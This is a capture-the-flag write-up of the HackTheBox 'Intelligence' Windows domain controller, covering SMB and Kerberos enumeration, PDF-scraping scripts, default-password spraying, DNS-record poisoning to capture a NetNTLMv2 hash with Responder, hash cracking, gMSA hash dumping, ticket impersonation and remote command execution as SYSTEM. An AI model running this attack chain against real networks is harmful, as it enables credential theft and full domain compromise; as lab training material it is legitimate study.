```
┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.248
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-10 10:05:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49708/tcp open  msrpc         Microsoft Windows RPC
64420/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```
This looks like a standard Windows domain controller: DNS (53), Kerberos (88), LDAP/LDAPS (389/636, global catalog on 3268/3269), SMB (445), WinRM (5985) and an IIS web server on 80. The host name is DC and the domain is intelligence.htb.
```
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul  4 07:18:41 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... intelligence.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ========================================================
|    Enumerating Workgroup/Domain on intelligence.htb    |
 ========================================================
[E] Can't find workgroup/domain

 ================================================
|    Nbtstat Information for intelligence.htb    |
 ================================================
Looking up status of 10.129.80.199
No reply from 10.129.80.199

 =========================================
|    Session Check on intelligence.htb    |
 =========================================
[+] Server intelligence.htb allows sessions using username '', password ''
[+] Got domain/workgroup name:

 ===============================================
|    Getting domain SID for intelligence.htb    |
 ===============================================
Domain Name: intelligence
Domain Sid: S-1-5-21-4210132550-3389855604-3437519686
[+] Host is part of a domain (not a workgroup)

 ==========================================
|    OS information on intelligence.htb    |
 ==========================================
[+] Got OS info for intelligence.htb from smbclient:
[+] Got OS info for intelligence.htb from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =================================
|    Users on intelligence.htb    |
 =================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 =============================================
|    Share Enumeration on intelligence.htb    |
 =============================================
        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on intelligence.htb

 ========================================================
|    Password Policy Information for intelligence.htb    |
 ========================================================
[E] Unexpected error from polenum:
[+] Attaching to intelligence.htb using a NULL share
[+] Trying protocol 139/SMB...
        [!] Protocol failed: Cannot request session (Called Name:INTELLIGENCE.HT)
[+] Trying protocol 445/SMB...
        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient

 ==================================
|    Groups on intelligence.htb    |
 ==================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

 ===========================================================================
|    Users on intelligence.htb via RID cycling (RIDS: 500-550,1000-1050)    |
 ===========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

 =================================================
|    Getting printer info for intelligence.htb    |
 =================================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Sun Jul  4 07:19:54 2021
```
Nothing much here (every RPC call is denied to the null session), so let's try an anonymous SMB login directly.
Anonymous Login
```
┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# smbclient -L //intelligence.htb
Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
```
Anonymous login is accepted, but the share listing comes back empty, so there is nothing we can read without credentials. Let's enumerate further.
LDAP
Let's do an LDAP search to get the naming contexts of the Active Directory domain.
```
┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# exiftool 2020-01-01-upload.pdf
ExifTool Version Number         : 12.16
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 26 KiB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2021:07:09 23:58:06-04:00
File Inode Change Date/Time     : 2021:07:09 23:58:06-04:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee

┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# exiftool 2020-12-15-upload.pdf
ExifTool Version Number         : 12.16
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 KiB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2021:07:09 23:58:19-04:00
File Inode Change Date/Time     : 2021:07:09 23:58:19-04:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams
```
The two PDFs from the web server's /documents/ folder carry their author in the Creator field: William.Lee and Jose.Williams. That looks like the domain's username format, so let's build a wordlist of name combinations and validate them against Kerberos with kerbrute.
Kerberos
Thinking about the wordlist, I came up with the one below.
In this case you don't actually need the wordlist, because the Creator value is already the username format (First.Last). In a real engagement or a harder CTF you will often only have people's names, and then generating the usual formats as above is the way to find the right convention.
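As an added example of that step (not the write-up's own wordlist), the script below turns the names from the PDF metadata into the common corporate username formats and writes them out for kerbrute. The set of formats, the output file name kerb_users.txt, and the handling of single-token names are assumptions of this example.

```python
#!/usr/bin/env python3
"""Build a kerbrute user-enumeration wordlist from people's names.
Added example, not the write-up's own list; FORMATS is an assumption that
covers the usual corporate conventions (first.last, flast, f.last, ...)."""

FORMATS = (
    '{first}.{last}', '{first}{last}', '{f}{last}', '{f}.{last}',
    '{first}{l}', '{first}.{l}', '{last}.{first}', '{last}{first}',
    '{last}{f}', '{last}.{f}', '{first}', '{last}', '{f}{l}',
)


def username_candidates(full_names, formats=FORMATS):
    """Return unique lowercase candidates in first-seen order.
    'Jose.Williams', 'Jose Williams' and 'jose_williams' all split the same way;
    a single-token name is emitted as-is because there is no last name to combine."""
    out, seen = [], set()
    for name in full_names:
        parts = name.replace('.', ' ').replace('_', ' ').lower().split()
        if not parts:
            continue
        first, last = parts[0], parts[-1]
        if len(parts) == 1:
            cands = [first]
        else:
            fields = {'first': first, 'last': last, 'f': first[0], 'l': last[0]}
            cands = [fmt.format(**fields) for fmt in formats]
        for cand in cands:
            if cand not in seen:          # dedupe: 'jw' may come from several names
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == '__main__':
    names = ['Jose.Williams', 'William.Lee']   # the two Creator values from exiftool
    with open('kerb_users.txt', 'w') as fh:
        fh.write('\n'.join(username_candidates(names)) + '\n')
```

Feed the file to kerbrute's user enumeration, which tells valid from invalid usernames apart by the KDC's AS-REQ error codes without locking anyone out: `kerbrute userenum -d intelligence.htb --dc 10.10.10.248 kerb_users.txt`.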
So now we have two valid users. Before brute-forcing passwords, check the low-hanging fruit: Impacket's GetNPUsers.py (AS-REP roasting, which works on accounts with Kerberos pre-authentication disabled). That returned nothing, so I figured there had to be more elsewhere and went back to the PDFs.
Web
The PDF names are a date followed by -upload.pdf, so I brute-forced every date to see whether there are more documents. The script below creates a pdf directory and downloads every file that exists.
```python
#!/usr/bin/python3
import os
import requests

url = 'http://intelligence.htb/documents/'
os.makedirs('pdf', exist_ok=True)

# File names follow YYYY-MM-DD-upload.pdf, so walk every date in 2020-2021.
# Days run to 31: the original loop stopped at 30 and would have missed the 31st.
for i in range(2020, 2022):
    for j in range(1, 13):
        for k in range(1, 32):
            date = f'{i}-{j:02}-{k:02}-upload.pdf'
            r = requests.get(url + date)
            if r.status_code == 200:
                print(date)
                with open(f'pdf/{date}', 'wb') as f:
                    f.write(r.content)
```
As the number of PDFs was large, I wrote another script to pull the usernames out of the Creator field.
```python
#!/usr/bin/python3
import os
import subprocess

# Ask exiftool for the bare Creator value of every downloaded PDF
# (-s3 prints values only) and collect the unique names into users.txt.
files = sorted(os.listdir('pdf'))
seen = set()
with open('users.txt', 'w') as f:
    for name in files:
        creator = subprocess.run(['exiftool', '-s3', '-Creator', f'pdf/{name}'],
                                 capture_output=True, text=True).stdout.strip()
        if creator and creator not in seen:
            seen.add(creator)
            f.write(creator + '\n')
            print(creator)
```
That writes users.txt for you. With the full list you can retry GetNPUsers.py, but it still finds nothing, so let's dig into the content of the PDFs. To search them for a password I wrote this small script:
```python
#!/usr/bin/python3
import os
from pdfminer.high_level import extract_text   # pip install pdfminer.six

keywords = 'password'
files = sorted(os.listdir('pdf'))

# Print the name and full text of every PDF whose body mentions the keyword.
for i in files:
    text = extract_text('pdf/' + i)
    if keywords in text:
        print(i)
        print(text)
```
So this will give you the following output.
```
┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# python3 getpass.py
2020-06-04-upload.pdf
New Account Guide

Welcome to Intelligence Corp! Please login using your username and the default password of: NewIntelligenceCorpUser9876

After logging in please change your password as soon as possible.
```
So now we have the default password; let's spray it across users.txt. kerbrute didn't give me a hit, but crackmapexec did: the default password is still valid for Tiffany.Molina. Listing the shares with her credentials (smbmap -R output below) shows which ones she can read:
```
[\] Working on it...
[+] IP: intelligence.htb:445    Name: unknown
[-] Working on it...
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        .\IPC$\*
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    lsass
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    scerpc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-39c-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    epmapper
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-1b8-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    eventlog
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-394-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    atsvc
        fr--r--r--                4 Sun Dec 31 23:58:45 1600    wkssvc
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-258-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-4e8-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-258-1
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    RpcProxy\49677
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    01c597a227e270af
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    RpcProxy\593
        fr--r--r--                5 Sun Dec 31 23:58:45 1600    srvsvc
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    efsrpc
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    netdfs
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-240-0
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    W32TIME_ALT
        fr--r--r--                3 Sun Dec 31 23:58:45 1600    cert
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-9f0-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-a7c-0
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Sun Dec 31 23:58:45 1600    Winsock2\CatalogChangeListener-a50-0
        IT                                                      READ ONLY
        .\IT\*
        dr--r--r--                0 Mon Apr 19 01:50:58 2021    .
        dr--r--r--                0 Mon Apr 19 01:50:58 2021    ..
        fr--r--r--             1046 Mon Apr 19 01:50:58 2021    downdetector.ps1
        NETLOGON                                                READ ONLY       Logon server share
        .\NETLOGON\*
        dr--r--r--                0 Mon Apr 19 01:42:14 2021    .
        dr--r--r--                0 Mon Apr 19 01:42:14 2021    ..
        SYSVOL                                                  READ ONLY       Logon server share
        .\SYSVOL\*
        dr--r--r--                0 Mon Apr 19 01:42:14 2021    .
        dr--r--r--                0 Mon Apr 19 01:42:14 2021    ..
        dr--r--r--                0 Mon Apr 19 01:42:14 2021    intelligence.htb
        Users                                                   READ ONLY
        .\Users\*
        dw--w--w--                0 Mon Apr 19 02:20:26 2021    .
        dw--w--w--                0 Mon Apr 19 02:20:26 2021    ..
        dr--r--r--                0 Mon Apr 19 01:18:39 2021    Administrator
        dr--r--r--                0 Mon Apr 19 04:16:30 2021    All Users
        dw--w--w--                0 Mon Apr 19 03:17:40 2021    Default
        dr--r--r--                0 Mon Apr 19 04:16:30 2021    Default User
        fr--r--r--              174 Mon Apr 19 04:15:17 2021    desktop.ini
        dw--w--w--                0 Mon Apr 19 01:18:39 2021    Public
        dr--r--r--                0 Mon Apr 19 02:20:26 2021    Ted.Graves
        dr--r--r--                0 Mon Apr 19 01:51:46 2021    Tiffany.Molina
```
Tiffany.Molina can read IT, NETLOGON, SYSVOL and Users, so let's go through those.
User.txt
```
┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# smbclient //intelligence.htb/Users -U 'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> cd Tiffany.Molina\Desktop\
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\> quit

┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# cat user.txt
6fd023d238f2d2a63ecb521504fc1dd3
```
Now you have user.txt
PrivESC
Enumeration
The share that looked interesting to me was IT, so let's look into that.
```
┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# smbclient //intelligence.htb/IT -U 'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 18 20:50:55 2021
  ..                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021

                3770367 blocks of size 4096. 1463495 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
```
Looks like we have a powershell script let’s explore it.
```powershell
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
```
This is a scheduled task (the Windows equivalent of a cron job) that runs every five minutes. It pulls every record from the AD-integrated DNS zone whose name starts with web (Where-Object Name -like "web*") and requests http://<name>/ with -UseDefaultCredentials, so the request is authenticated as the account the task runs as; the From address suggests that is Ted.Graves. There is no further validation, so any record with that prefix gets requested.
By default, any authenticated domain user can create records in an AD-integrated DNS zone (ADIDNS). If we add a web* record pointing at our host, the next run will connect to us, and when our listener answers with an NTLM challenge the script will send Ted.Graves's NetNTLMv2 response, which Responder captures and we can crack offline.
Start Responder on the VPN interface. The output below shows it in analyze mode (-A); that only disables LLMNR/NBT-NS/mDNS poisoning, which we don't need here, because the task resolves our record through the DC's own DNS and connects straight to Responder's HTTP server.
```
[+] Poisoning Options:
    Analyze Mode               [ON]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.14]
    Challenge set              [1122334455667788]
    Don't Respond To Names     ['ISATAP']

[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.14) is not on the same subnet than the DNS server (<--SNIP--->).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.14) is not on the same subnet than the DNS server (<---SNIP---->).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[+] Listening for events..
```
Now let's use dnstool.py to add the DNS record. It is part of krbrelayx, which you can find here:
krbrelayx
You can install it like below.
```
kali@kali:~/HackTheBox/Intelligence$ git clone https://github.com/dirkjanm/krbrelayx.git
Cloning into 'krbrelayx'...
remote: Enumerating objects: 98, done.
remote: Total 98 (delta 0), reused 0 (delta 0), pack-reused 98
Unpacking objects: 100% (98/98), 65.74 KiB | 474.00 KiB/s, done.
kali@kali:~/HackTheBox/Intelligence$ cd krbrelayx/
kali@kali:~/HackTheBox/Intelligence/krbrelayx$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md

┌──(root💀kali)-[~/krbrelayx]
└─# python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d 10.10.14.6 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/root/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
```
Now our record is in DNS, so let's wait for the hash in Responder. The record's data (-d) must be the address Responder is listening on. The task only runs every five minutes, so be patient.
Now we have Ted.Graves's NetNTLMv2 response; let's try to crack it. I used john here; hashcat (mode 5600) works just as well, and there are online crackers if you prefer those.
```
kali@kali:~/HackTheBox/Intelligence/krbrelayx$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy         (Ted.Graves)
1g 0:00:00:23 DONE (2021-07-04 18:17) 0.04170g/s 450978p/s 450978c/s 450978C/s Mrz.deltasigma..Mr BOB
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
```
Now we have Ted.Graves's password. As we already know the shares hold nothing more, let's enumerate LDAP with his account. I got gMSADumper from the link.
Run as Ted.Graves, gMSADumper returns the NT hash of the group Managed Service Account svc_int (it can only do that for principals allowed to read the account's msDS-ManagedPassword attribute). So we have a hash, but unfortunately it's not in rockyou.txt. It never will be: a gMSA password is 256 random bytes generated and rotated by the DC, so wordlist cracking is pointless by design.
```
kali@kali:~/HackTheBox/Intelligence/gMSADumper$ sudo john new --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hashtype, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 DONE (2021-07-04 18:30) 0g/s 3431Kp/s 3431Kc/s 3431KC/s markinho..*7¡Vamos!
Session completed
```
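As an added example (not the write-up's code) covering both hashes in this section, the NetNTLMv2 response cracked above and the gMSA NT hash that rockyou cannot touch: the first half rebuilds the NTLMv2 computation from a password, user, domain and the captured challenge and blob, so a candidate can be checked exactly the way john does; the second parses an MSDS-MANAGEDPASSWORD_BLOB (the msDS-ManagedPassword value gMSADumper reads) into the NT hash. The capture line and the blob are constructed inline: Responder's fixed challenge 1122334455667788 is the one in its banner above, while the timestamp, client challenge and AV pairs in the blob are placeholders. MD4 is implemented inline because OpenSSL 3 builds of hashlib often refuse it.

```python
#!/usr/bin/env python3
"""Offline handling of the two hashes in this section (added example, not the
write-up's code): (1) verify or crack a Responder NetNTLMv2 line in john's
format; (2) turn a gMSA msDS-ManagedPassword blob into the NT hash gMSADumper prints."""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; OpenSSL 3 builds of hashlib often refuse 'md4'."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = bytearray(data) + b'\x80'
    msg += b'\x00' * ((56 - len(msg)) % 64)
    msg += struct.pack('<Q', (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack('<16I', msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[j] + k) & MASK, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack('<4I', a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password))."""
    return _md4(password.encode('utf-16le'))


def ntlmv2_proof(password, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, UPPER(user)+domain), server_challenge + blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode('utf-16le'), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def crack_netntlmv2(john_line, candidates):
    """john_line is Responder's/john's user::domain:challenge:ntproofstr:blob format."""
    user, _, domain, chal, proof, blob = john_line.strip().split(':')
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for cand in candidates:
        if hmac.compare_digest(ntlmv2_proof(cand, user, domain, chal, blob), proof):
            return cand
    return None


def forge_sample_netntlmv2(password, user, domain, server_challenge=bytes.fromhex('1122334455667788')):
    """Constructed capture: the answer a client gives to Responder's fixed challenge.
    Timestamp, client challenge and AV pairs are placeholders, not a real capture."""
    av_pairs = struct.pack('<HH', 2, 2 * len(domain)) + domain.encode('utf-16le') + struct.pack('<HH', 0, 0)
    blob = (b'\x01\x01\x00\x00' + b'\x00' * 4 + struct.pack('<Q', 132652800000000000)
            + os.urandom(8) + b'\x00' * 4 + av_pairs + b'\x00' * 4)
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f'{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}'


def build_gmsa_blob(password_utf16: bytes, query_interval=0, unchanged_interval=0) -> bytes:
    """Constructed MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19) with no previous password."""
    current = password_utf16 + b'\x00\x00'            # null-terminated WCHAR string
    cur_off = 16                                       # fixed header size
    pad = (-(cur_off + len(current))) % 8              # align QueryPasswordInterval to 8 bytes
    q_off = cur_off + len(current) + pad
    u_off = q_off + 8
    header = struct.pack('<HHLHHHH', 1, 0, u_off + 8, cur_off, 0, q_off, u_off)
    return header + current + b'\x00' * pad + struct.pack('<QQ', query_interval, unchanged_interval)


def gmsa_nt_hash(blob: bytes) -> str:
    """NT hash of CurrentPassword, the value gMSADumper prints for svc_int."""
    version, _, length, cur_off, prev_off, q_off, _ = struct.unpack('<HHLHHHH', blob[:16])
    if version != 1 or length != len(blob):
        raise ValueError('not a version 1 MSDS-MANAGEDPASSWORD_BLOB')
    current = blob[cur_off:prev_off or q_off].rstrip(b'\x00')   # drop terminator + padding
    if len(current) % 2:
        current += b'\x00'                                         # last code unit had a zero high byte
    return _md4(current).hex()


if __name__ == '__main__':
    line = forge_sample_netntlmv2('Mr.Teddy', 'Ted.Graves', 'intelligence')
    print(line)
    print('cracked:', crack_netntlmv2(line, ['Mrz.deltasigma', 'Mr BOB', 'Mr.Teddy']))
    # A real gMSA password is 256 bytes from the DC's RNG, not a word; zero bytes are
    # avoided here only because the blob stores it as a null-terminated string.
    gmsa_pw = bytes(b % 255 + 1 for b in os.urandom(256))
    print('gMSA NT hash:', gmsa_nt_hash(build_gmsa_blob(gmsa_pw)))
```

The line the script prints is in the format john loads with --format=netntlmv2, so you can compare its verdict with the cracker's. The point of the gMSA half is the input length: 256 bytes of DC-generated randomness means the NT hash is only useful for pass-the-hash or for requesting Kerberos tickets (getST.py), never for cracking.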
So the other option is to use svc_int's NT hash directly with Kerberos and obtain a service ticket as Administrator. The write-up calls this a Silver Ticket attack, and you can search for "Silver Ticket attack Active Directory" to read more, but strictly speaking getST.py with -impersonate asks the KDC for the ticket through S4U2self/S4U2proxy, which requires svc_int to be trusted for delegation to the target service; a true silver ticket is forged offline from the service key and never touches the KDC. Either way the NT hash is enough and the cleartext password is never needed. Let's try it.
```
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
```
It fails on clock skew, which is normal with Kerberos: tickets and authenticators carry timestamps, and the KDC rejects anything more than (by default) five minutes off its own clock. Sync your clock with the DC using ntpdate; if you don't have it, install it with
```shell
sudo apt-get install ntpdate
```
then run the command
```shell
sudo ntpdate 10.10.10.248
```
With the clock in sync, let's try the ticket request again. If the time does not stay changed, an NTP daemon on your box (chrony or systemd-timesyncd) is resetting it; stop that first, for example with sudo timedatectl set-ntp off, then run ntpdate again. With the ticket in Administrator.ccache (export KRB5CCNAME=Administrator.ccache), Impacket's -k -no-pass uses it against the DC's hostname, and the output confirms the scheduled task runs as NT AUTHORITY\SYSTEM before reading root.txt:
```
[!] This will work ONLY on Windows >= Vista
[*] Creating task \krUvePvx
[*] Running task \krUvePvx
[*] Deleting task \krUvePvx
[*] Attempting to read ADMIN$\Temp\krUvePvx.tmp
nt authority\system

┌──(root💀kali)-[~/hackthebox/machine/intelligence]
└─# python3 atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \ocxiGfwW
[*] Running task \ocxiGfwW
[*] Deleting task \ocxiGfwW
[*] Attempting to read ADMIN$\Temp\ocxiGfwW.tmp
5a582f5f16388c9959ef6d4b3dcbe914
```
Summary of knowledge
SMB enumeration
LDAP enumeration
write Python scripts to batch-download the PDFs and extract their metadata and text
enumerate users with kerbrute and spray the default password with crackmapexec
add a DNS record with krbrelayx's dnstool.py, then capture the NetNTLMv2 hash with Responder
crack the NetNTLMv2 hash with john
use gMSADumper to get svc_int's NT hash
sync time between the server and the attacking machine with ntpdate (stop chrony if it keeps resetting the clock)
use getST.py to get Administrator.ccache (called a Silver Ticket here; it is Kerberos S4U impersonation using svc_int's hash)
use smbclient.py or atexec.py with that ticket to get the user and root flags
Contact me
QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer
I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…